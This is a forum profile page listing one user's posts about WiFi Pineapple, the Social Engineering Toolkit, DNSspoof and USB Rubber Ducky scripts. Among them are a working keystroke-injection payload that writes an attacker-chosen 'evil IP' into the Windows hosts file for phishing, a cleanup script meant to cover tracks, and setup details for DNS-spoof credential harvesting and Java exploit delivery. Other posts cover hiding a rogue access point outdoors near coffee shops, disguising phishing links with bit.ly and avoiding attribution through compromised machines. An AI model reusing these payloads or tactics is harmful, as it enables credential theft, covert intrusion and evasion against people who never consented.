Jump to content

skimpniff

Active Members
  • Posts

    76
  • Joined

  • Last visited

  • Days Won

    1

Everything posted by skimpniff

  1. What's up crowd. When I first wanted to get into the Linux side of the house I decided on Ubuntu and sort have just stuck with it. I have finally gotten fed up with Precise not working with my system since the upgrade (constant GPU hangs being the front runner) and am looking to switch over to a new, clean install. Mint seems to be the top rated out thee at the moment, but since it is based on Precise, I am afraid I will encounter the same graphics issue. Does anyone have any ideas/suggestions/opinions on a smooth reliable distro. I am primarily looking for reliability, but a little sex appeal on the GUI would be nice too. I am not overly fond of Unity/Gnome 3, but I am not a hater either. It works, but I also have no qualms with Gnome 2 on my BT5R2 system. I may even just roll back to a previous version of Ubuntu if nothing else presents itself as a viable option. Will be running on a Tosh Sattelite with Intel graphics, 8GB RAM.
  2. I agree, complacency seems to be the common thread in the people getting caught (the skilled ones anyway). Combine that with some ego and you're toast. As for having a dedicated office, that's not feasible, but there are other ways that could potentially accomplish the same effect. Just throwing out ideas off the top of my head, you could use a compromised computer at a big box store like BestBuy or have an old crappy laptop/netbook dead-dropped somewhere with a static IP, or a non-attributable VPS setup. Then just do the standard stuff already dead-horsed in this thread (TOR both ends before reaching the middle etc.)
  3. This is an interesting article in general, but there is a part that relates to this conversation. Give it a read. http://www.wired.com/vanish/2009/11/ff_vanish2/ Fortunately, while I was shocked by the intensity of the pursuit, I had anticipated the tactics. To keep my Web surfing from being tracked I often used a piece of free software called Tor, designed to protect the Internet activities of dissidents and whistleblowers around the world. Tor masks a computer’s IP address by diverting its requests through designated routers around the world. So when I logged in to Gmail from IP 131.179.50.72 in Los Angeles, the logs showed my request originating from 192.251.226.206 in Germany. But as my friend from Google had reminded me, no security is unbreakable, so I’d added another layer: Vegas. I used the laptop I carried with me to log in remotely to my computers there, using free software from LogMeIn.com. The Vegas machines, in turn, were running Tor. Anyone clever enough to untangle those foreign routers would get only as far as a laptop sitting in an empty office on South Pecos Road. The take away being to have a physical air gap somewhere along with another layer of remote access. Harkens back to the train station scene in Hackers where they have the payphones taped together.
  4. Thanks Darren. I hadn't really considered using both to be honest. I was thinking the scenarios in the OP would be separate, so the question of whether the 3G or the WAN port would be the default hadn't occurred to me. Your episode regarding the 3G dongle answered all of my questions on that front. You're right about the other scenario being the more challenging because of the aforementioned IDPS likely to be present and the bells and whistles it will set off. I suppose in that case dialing out would be less of an immediate concern, since if you have physical access enough to get a wireless tap installed, staying close enough to connect shouldn't be too big of a problem. That being said, it would be nice to be able to not be the weird guy camped out on his laptop all day in the lobby. Once I get my DNSspoof loop situation hammered out, I am going to work on trying to combine these two ideas. I think having a dropbox that can connect to a remote SET server could have some potential. I'm sure the latency issues if it worked would prove challenging, but it would still be cool. I'll keep on keeping on and if I figure out anything worth sharing I'll post it.
  5. Just use the social engineering toolkit (SET) and don't re-invent the wheel. I talk bout it more in my post here: http://forums.hak5.org/index.php?showtopic=26845
  6. Ok, so I have found some interesting and relevant items while poking around the SET config folders. I thought I'd post what I found here, partly because it is relevant to the topic and partly because I have seen the question "Where does SET put the cloned site" in half a dozen posts across the web. Disclaimer: This is for Backtrack5 R2 So first, when you use the site cloner option in SET, the cloned site html file used for the exploit is: /pentest/exploits/set/src/program_junk/web_clone/index.html Second, the config file for SET that dictates which web templates to use and where to redirect the victim if a particular template is used (including web cloner) is: /pentest/exploits/set/src/html/templates/template.py For applicability of this post, the existing templates (for facebook at least) appear to be a little out of date so I recommend running an exploit of your choice and selecting site cloner for the site of your choice. Then navigate to option one above, copy the index.html file to the template folder relative to the site you just cloned. If you are using a page that already has an existing template, just copy it overate[/b]. If you are going to make your own template folder, don't forget to append the template.py file appropriately. Next is theory at this point because I haven't actually tried a full test, but I have tried stages independently and I believe it will work. Once I confirm or deny I'll update the post. In the template.py file the last line of each template command tells SET to redirect to the actual website after executing the script and uses the full URL (ie "http://www.facebook.com"). If the last line is changed to the IP address instead of the URL, SET will successfully send the browser to the correct website via the IP vice the URL, preventing DNSspoof from looping it back around to SET again. If this solution alone still doesn't work, I'll try changing the DNSspoof command from 192.168.1.x *facebook.com to 192.168.1.x http://www.facebook.com 192.168.1.x www.facebook.com This way, even if the IP is converted to the URL by the browser, it should still work because the IP addresses for facebook all navigate to https://www.facebook.com. If anyone tries this before I get a chance to, please confirm or deny success. UPDATE: No luck so far.
  7. Yea, all regular traffic would be running through the pineapple "business-as-usual" on the 172 network, having whatever pineapple salad you want fed to it. DNSspoof would be on, but only to grab example.com and throw it over to the MITM machine hooked up via ethernet (in this case: 192.168.1.8 *example.com) for SET to work it's magic (via port 80 where SET establishes it's own server) then throw it back into the wild with a new passenger (Java exploit) or a little lighter (captured creds). As for a pineapple tool to help, would it be feasible to have the pineapple (DNSspoof) determine if the user was already spoofed and not repeat the spoof (like Dave mentioned)? For example: target A connects to WifiPineapple and tries to got to example.com. DNSspoof recognizes example.com and sends target A to 192.168.1.x (SET). SET exploits target A and redirects to example.com. DNSspoof detects target A has already been spoofed and ignores Target A allowing target A to connect to real example.com. target A updates status on example.com, complaining about how slow WifiPineapple is, but at least its free internet. Hilarity ensues. The exploits work now, and if the operator were to disable DNSspoof after the exploit, the target would go about their merry way unaware. As it stands now, when the target is redirected from SET, a "page not available" shows because of being caught in the web again. The ideal situation would be to not have to manually disable DNSspoof so you can catch more than one phish and allow the process to remain automated.
  8. Thanks for the reply. I will take a look at those and see what I see. If I am still confounded I'll be back to ask more questions. This is exactly what I was looking for, thanks again. EDIT: For those with the same question, here is the episode: http://hak5.org/episodes/hak5-1112
  9. The idea is to use the pineapple for traffic analysis (or any other Pineapple salad), but have targeted users redirected to SET for exploit via the bevy of tools SET offers. This could be for a couple of reasons, 1) negating the need for spear phishing/trying to get a target to click a link (ie all attempts to get to facebook trigger an exploit) 2)facilitating a social engineering/spear phishing attack (ie an email targeting WinXP/7 users with a real link such as microsoft.com that is then redirected, vice the more complicated option of constructing a believable link to a fake server address). This would allow more attack vectors to occur simultaneously, traffic analysis and java attack for system exploit to name a couple. Also, by using the Pineapple the attacker would not need to gain access to a specific network and negotiate any of the possible roadblocks presented, and would also be able to remote deploy the attack multiple times in multiple places with reduced setup time. I got a reply from Dave Kennedy when I asked the same question, his response: ...no workaround as of yet, I need to rehaul the backend so that after a certain counter is hit from an IP it kills the dnsspoof portion of it by replacing the legit hacker site with the real one...and redirects back to victim. it's a bit challenging and not an easy one.. I'll get to it when I can =)
  10. This is way noob, I know...please forgive me. How do you connect to your Pineapple in the wild under these circumstances? Pineapple connected to internet via 3G dongle. Pineapple connected to internet via an Ethernet port that you do not control. (ie. plugging into an accessible port in the target organization) I know AutoSSH is the key, but I have little experience with reverse SSH connection. I would like to practice standalone pineapple deployment in a target rich "test" environment and be able to successfully remote access/interface from a separate network. Additional questions on this front, if you are mobile (say using a laptop and multiple open networks as you travel) and the pineapple is stationary, how would you have the pineapple find you to dial back? If you do not have a static ip (due to travel or a proxy), how could you resolve this?
  11. Awesome, thank you for the feed back guys. I have definitely looked at the Otterbox options, however, the reason I am considering the one previously listed is because it is also weather proof, but would blend in more with exterior building hardware. Hypothetically, a Mk4 with a 3G dongle and a battery pack could be magnetically or otherwise attached near gas meters, power boxes, or sprinkler control boxes of local coffee shops or a campus location of your choice and draw little or no notice to the casual observer. I AM also looking at interior camouflage options, but in most settings, another blinking box near the server room or printer bay would probably be overlooked as well.
  12. Pineapple Hardware Version: Mark IV Pineapple Software Version (ex: Shmoocon Beta, 1.0, etc.):2.3.1 OS used to connect to the pineapple:Backtrack 5 R2 Network layout of how your setup is connected (including IP information):default ICS via ethernet All the tools/options that are running on the pineapple when the issue happened: DNSspoof Is the problem repeatable (Yes/No):Yes Anything else that was attempted to 'fix' the problem: Greetings, I have searched message boards galore and not found a satisfactory answer yet. I am trying to resolve the DNSspoof "loop" issue faced when using it to connect to SET. I am specifically trying to resolve this using the Wifi Pinapple Mk4. Obviously if the *example.com command is used, the redirection from SET to the legitimate page will be captured in the DNSspoof parameters thereby catching the victim in a loop and reducing the "ninja" factor of the attack. Do you have a suggestion or perhaps know of a discussion that already exists that addresses this issue successfully? I have tried using the IP address in lieu of example.com (in the DNSspoof parameters), but that does not seem to work. I have also thought about replacing the redirect address for SET to the IP vs the URL, but have not had the opportunity to try it yet. Is this idea something that would need to be attempted from a template, or is it possible to modify the cloned site created when using the "clone site" option in SET. The setups I have used so far are: Initiate standard SET setup for credential harvester in BT5R2, using site cloner. IP = 192.168.1.8:80 The following DNSspoof commands in Pineapple: 192.168.1.8 *example.com (credential harvest success, redirect failure) 192.168.1.8 IP Address for example.com (failure to connect to SET) EDIT: I realize now this wouldn't work because nobody types in the IP to navigate anywhere. (Duh).
  13. Hello community. I am considering getting this http://www.amazon.com/WLanParts-Enclosure-9X6x3-Outdoor-1-Port/dp/B004EI0E6O/ref=pd_sbs_hi_1 for covert deployment of the pineapple. Has anyone experimented with the battery-packed Pinapples in an enclosure? I know Darren did a segment using an Otterbox but considering this would be used for outdoor use (say around the local coffee shop or campus)there is the high probability of exterior adding to any natively generated heat. Is there any risk of burning out the electronics or battery pack? Thanks.
  14. I have used this technique taken from http://www.thedr1ver.com/2011/04/credential-harvesting-with-facebook-and.html It doesn't answer your DNS Spoof question, but gives an alternative to the problem of getting a victim to bite. Now, obviously most people will not click on a link that looks like a random IP address. However, there are multiple ways to disguise that link. My favorite of which is converting the IP address into a bit.ly link. To do this, copy your external IP address and go to http://bit.ly/. Paste the external IP address and click the 'shorten' button. This will convert the link to something like http://bit.ly/900913 that looks a bit more friendly than a raw IP address. Then, you can feel free to add it to a specially crafted email sent to your victim, or cast a wider fishnet and post a Tweet like: @Phisherman123: Shooting at Fells Point Pirate Festival http://bit.ly/ysqb.
  15. Here is a cleanup script. Very simple for if you want to reset the hosts file to empty to cover your tracks. REM Author: skimpniff REM Description: Clean up by resetting the hosts file back to empty and deleting the inject.bat file ESCAPE CONTROL ESCAPE DELAY 600 STRING cmd DELAY 1000 MENU DELAY 1000 STRING a DELAY 1000 LEFT DELAY 1000 ENTER DELAY 400 STRING cd drivers\etc\ DELAY 400 ENTER DELAY 400 STRING copy con hosts DELAY 400 ENTER ENTER DELAY 400 STRING All ENTER ENTER DELAY 400 CONTROL z DELAY 400 ENTER DELAY 400 STRING exit ENTER Here is a modification to add to bottom of the original that deletes the inject.bat file CONTROL z ENTER DELAY 400 STRING inject.bat ENTER DELAY 400 STRING del c:\windows\system32\inject.bat ENTER DELAY 400 STRING exit ENTER
  16. Based on the original script by Koryusai-Kun written for Win7 I take minimal credit for this, I only took a great script and modified it for XP. Darren, how do we get new payloads onto the GitHub site? Through you or is there a more direct way? REM Author: .:skimpniff:. REM Based on the original script by Koryusai-Kun written for Win7 REM Modified for use on WinXP REM Description: Used for phishing, it add's ips of your choosing to the hosts file on windows REM Description: so when the user types the website into there web browser it redirects them REM Description: to your evil IP. Works perfectly in conjunction with SET. REM Description: Don't forget to add both versions, with and without the www prefix. GUI r DELAY 600 STRING cmd DELAY 400 STRING cd %WINDIR%\system32\drivers\etc\ DELAY 400 STRING copy con inject.bat DELAY 400 ENTER DELAY 400 STRING SET NEWLINE=^& echo. ENTER DELAY 400 STRING FIND /C /I "WEBSITE" %WINDIR%\system32\drivers\etc\hosts ENTER DELAY 400 STRING IF %ERRORLEVEL% NEQ 0 ECHO %NEWLINE%^EVIL.IP.ADDRESS WEBSITE>>%WINDIR%\system32\drivers\etc\hosts ENTER STRING FIND /C /I "www.WEBSITE" %WINDIR%\system32\drivers\etc\hosts ENTER DELAY 400 STRING IF %ERRORLEVEL% NEQ 0 ECHO %NEWLINE%^EVIL.IP.ADDRESS www.WEBSITE>>%WINDIR%\system32\drivers\etc\hosts ENTER DELAY 400 CONTROL z ENTER DELAY 400 STRING inject.bat ENTER DELAY 600 STRING exit ENTER
  17. This is my go-to. http://www.kryptoslogic.com/area02/item02/index.html
  18. I've not been able to get this to successfully execute. Can anyone confirm it's successful operation? I tweaked the delays and it works like a charm. My next project related to this is a quick edit to this that will include the commands necessary (replying "yes") to overwrite the existing hosts file. For those not familiar, if you successfully execute this command and try to run it again, you are prompted with a command line prompt asking for permission to overwrite the existing file. As soon as I have it tested and working, I'll post it. I went a simpler route, see the following post.
  19. Check the forum post labeled "slowing down the keystrokes" (or something to that effect).
  20. STRING_DELAY 50 worked fine for me whereas 1 was still too fast. I worked my way up to 3 and it was still too quick, so I just made the leap to 50 out of frustration and it worked. A lower number would probably work, I just wanted to be able to effectively test the scripts. Once I confirm they work properly, I will work on fine tuning the timing. I imagine it could be a variation in the way our VM's are setup. Theoretically, a normal computer wouldn't need the STRING_DELAY, right? I haven't seen this issue anywhere else in the forums other than referencing VM's.
  21. After some experimentation I have found the answer. To insert the delay between STRING character inputs, the proper syntax is STRING_DELAY N (where N is the time delay) I found STRING_DELAY 50 to work perfectly, ie. GUI d DELAY 500 PRINTSCREEN DELAY 100 MENU DELAY 300 STRING V DELAY 40 STRING D DELAY 300 GUI r DELAY 700 STRING_DELAY 50 mspaint ENTER DELAY 1200 CTRL v DELAY 500 CTRL s DELAY 1000 STRING_DELAY 50 %userprofile%\a.bmp ENTER DELAY 500 ALT f DELAY 400 STRING K DELAY 100 STRING F DELAY 1000 ALT F4 DELAY 300 GUI d
  22. No love here eh? To clarify, I am not trying to add DELAYS to slow down the script execution, just to slow down how fast the duck types the actual keystrokes. It is entering incomplete commands because the VM Bus is unable to keep up.
  23. My question is the same as above, regarding the STRINGDELAY for slowing down the text input. I have the same problem, my VM bus can't keep up with the duck speed. So would a simple STRINGDELaY n preceding the command e.g STRINGDELAY 5 STRING SomeText be sufficient or does a more detailed breakout need to be done, as in STRING S STRINGDELAY 5 STRING o STRINGDELAY 5 STRING m Thanks for the assist.
  24. Was there ever an answer figured out for this?
  25. I have found the answer further in the forum, my apologies for not looking further before asking.For reference see the post on page 2 titled "slowing down key strokes"
×
×
  • Create New...